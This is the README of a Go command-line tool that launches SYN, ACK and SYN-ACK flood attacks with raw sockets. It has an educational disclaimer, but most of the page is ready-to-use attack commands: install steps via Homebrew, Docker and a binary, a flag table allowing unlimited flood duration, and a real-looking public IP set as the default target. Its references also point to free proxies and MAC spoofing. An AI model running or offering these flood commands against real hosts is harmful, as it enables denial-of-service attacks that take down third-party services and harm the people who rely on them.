This project is developed with the objective of learning low level network operations with Golang. It starts a syn flood attack with raw sockets.
This tool is created for the sole purpose of security awareness and education, it should not be used against systems that you do not have permission to test/attack. The author is not responsible for misuse or for any damage that you may cause. You agree that you use this software at your own risk.
You need root access to run syn-flood
syn-flood needs lots of open file descriptors while running so we need to increase it first. You can increase it like below temporarily.
$ sudo ulimit -S -n 2048000
$ sudo syn-flood --host foo.example.com --port 443 --floodType syn
If you still get "too many open files" error, try increasing the value that passed to first command.
syn-flood can be customized with several command line arguments:
Usage:
syn-flood [flags]
Flags:
--floodDurationSeconds int Provide the duration of the attack in seconds, -1 for no limit, defaults to -1 (default -1)
--floodType string Provide the attack type. Proper values are: syn, ack, synack (default "syn")
-h, --help help for syn-flood
--host string Provide public ip or DNS of the target (default "213.238.175.187")
--payloadLength int Provide payload length in bytes for each SYN packet (default 1400)
--port int Provide reachable port of the target (default 443)
-v, --verbose verbose output of the logging library (default false)
--version version for syn-flood
To be able to run syn-flood with unlimited time range, you should also increase your operating system open file limits, you can refer here about how to do that.
Binary can be downloaded from Releases page.
After then, you can simply run binary by providing required command line arguments:
$ sudo ./syn-flood --host 10.0.0.100 --port 443
Or with DNS:
$ sudo ./syn-flood --host foo.example.com --port 443
This project can be installed with Homebrew:
$ brew tap joshsagredo/tap
$ brew install joshsagredo/tap/syn-flood
$ sudo syn-flood --host foo.example.com --port 443 --floodType syn
Docker image can be downloaded with below command:
$ docker run joshsagredo/syn-flood:latest
This project requires below tools while developing:
- Golang 1.20
- pre-commit
- golangci-lint - required by pre-commit
- gocyclo - required by pre-commit
After you installed pre-commit, simply run below command to prepare your development environment:
$ pre-commit install -c build/ci/.pre-commit-config.yaml
- https://www.devdungeon.com/content/packet-capture-injection-and-analysis-gopacket
- https://www.programmersought.com/article/74831586115/
- https://github.com/rootVIII/gosynflood
- https://golangexample.com/repeatedly-send-crafted-tcp-syn-packets-with-raw-sockets/
- https://github.com/kdar/gorawtcpsyn/blob/master/main.go
- https://pkg.go.dev/github.com/google/gopacket
- https://github.com/david415/HoneyBadger/blob/021246788e58cedf88dee75ac5dbf7ae60e12514/packetSendTest.go
- mac spoofing -> google/gopacket#153
- free proxies -> https://www.sslproxies.org/
- What is an ACK flood DDoS attack? | Types of DDoS attacks
- https://bariskoparmal.com/2021/08/22/spesifik-ddos-saldirilari-ve-saldiri-komutlari/
- https://github.blog/2016-07-12-syn-flood-mitigation-with-synsanity/
Apache License 2.0